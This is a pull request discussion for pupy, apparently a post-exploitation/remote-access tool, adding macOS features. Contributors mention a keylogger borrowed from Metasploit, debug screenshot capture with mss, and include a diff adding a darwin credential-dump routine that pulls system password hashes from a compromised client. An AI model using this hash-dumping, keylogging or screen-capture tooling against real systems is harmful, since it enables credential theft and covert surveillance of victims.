### PR TITLE
Mac OS functions

### PR DESCRIPTION
**Pull request by AlessandroZ**

### CODE REVIEW

**Comment by AlessandroZ** [comment]
The keylogger is not the best one (do not manage multiple layout), however, it works. It has been taken from metasploit because it's quite easy and do not require external lib to embed instead of all python project that I have found.

**Comment by AlessandroZ** [comment]
All functions have been tested on the OS X VM - El Capitain

**Comment by alxchk** [comment]
If you have access to Mac, can you please try mss for screenshots? https://github.com/alxchk/pupy/commit/148548b01d82cac8983dce47d1114f46b9907336

I need to rewrite finally that forwarding and create pull request...

**Comment by AlessandroZ** [comment]
I have done some tests using mss. So it works great on a Linux host however I had some issue on Mac OS (I didn't try on a Windows host).

The problem is from the following line which returns a non valid dictionary. 
`monitors = screenshoter.enum_display_monitors()`

For example, my monitor size was equal to: 

```
{'width': 179769313486231570814527423731704356798070567525844996598917476803157260780028538760589558632766878171540458953514382464234321326889464182768467546703537516986049910576551282076245490090389328944075868508455133942304583236903222948165808559332123348274797826204144723168738177180919299881250404026184124858368L, 'top': -89884656743115785407263711865852178399035283762922498299458738401578630390014269380294779316383439085770229476757191232117160663444732091384233773351768758493024955288275641038122745045194664472037934254227566971152291618451611474082904279666061674137398913102072361584369088590459649940625202013092062429184L, 'height': 179769313486231570814527423731704356798070567525844996598917476803157260780028538760589558632766878171540458953514382464234321326889464182768467546703537516986049910576551282076245490090389328944075868508455133942304583236903222948165808559332123348274797826204144723168738177180919299881250404026184124858368L, 'left': -89884656743115785407263711865852178399035283762922498299458738401578630390014269380294779316383439085770229476757191232117160663444732091384233773351768758493024955288275641038122745045194664472037934254227566971152291618451611474082904279666061674137398913102072361584369088590459649940625202013092062429184L}
```

If I hard coded the dictionary using correct value, it worked well:
`monitors = [{'width': 1600, 'top': 0, 'height': 900, 'left': 0}]`

This lib looks good and very interesting. I will take a look if I will found the error. I think, it could be a solution to hard code value even it's not the best way to do it.

Note: I also had to add the PupyConfig file that you have in your git repository which is not present on the main pupy project.

**Comment by AlessandroZ** [comment]
I have managed to use mss without errors and I'm quite surprised how well it works. I was wrong about the problem.

That was my error: 
`[-] range() result has too many items`

However, I have noticed that the first cell of the monitor dictionary was wrong or was a duplicate value of the second cell. So doing so: https://github.com/n1nj4sec/pupy/pull/303/commits/ef29c7e25f03f717a6193ed27b45ad4b1ffb58f4#diff-0261e5563061d2e8b8bb4e2c8ff586bcR50 fixed the issue

I have tested it with one or multiple monitors on linux and mac os and it works very well. It should works on Windows without problem. With multiple monitors, multiple png files are created. I put these lines on comment because I did not use the pupyconfig file: https://github.com/n1nj4sec/pupy/pull/303/commits/a91a0e99373681b97a69524607e0341c90a0ce6d#diff-805b051f3432acd4412dafbea399eee2R85

**Comment by AlessandroZ** [comment]
@alxchk, when I see how many commits you have done on your fork project, I'm quite impressed. It could be great to add it to the main project ;)

**Comment by alxchk** [comment]
I change a lot there, some decisions were time consuming but broken (for example new network forwarding, which crashes on windows). Currently I'm on loong huge pentest, so I test that new functionality. After I fix major issues I'll start poll request

**Comment by AlessandroZ** [comment]
@alxchk no problem, thanks !

**Comment by n1nj4sec** [comment]
awesome ! :-)

File: pupy/modules/creddump.py [hunk 1]
```diff
@@ -52,8 +52,25 @@ def run(self, args):
...
+
+    def darwin(self):
+        self.client.load_package("hashdump")
+        hashes = self.client.conn.modules["hashdump"].hashdump()
+        if hashes:
+            db = Credentials()
+            db.add([
+                {'Hash':hsh[1], 'Login': hsh[0], 'Category': 'System hash', 'uid':self.client.short_name(), 'CredType': 'hash'} for hsh in hashes
+            ])
+            for hsh in hashes:
```
Comment (along7730) [inline pupy/modules/creddump.py]: good

**Comment by along7730** [comment]
thanx

**Comment by along7730** [comment]
on pull request

**Pull request merged**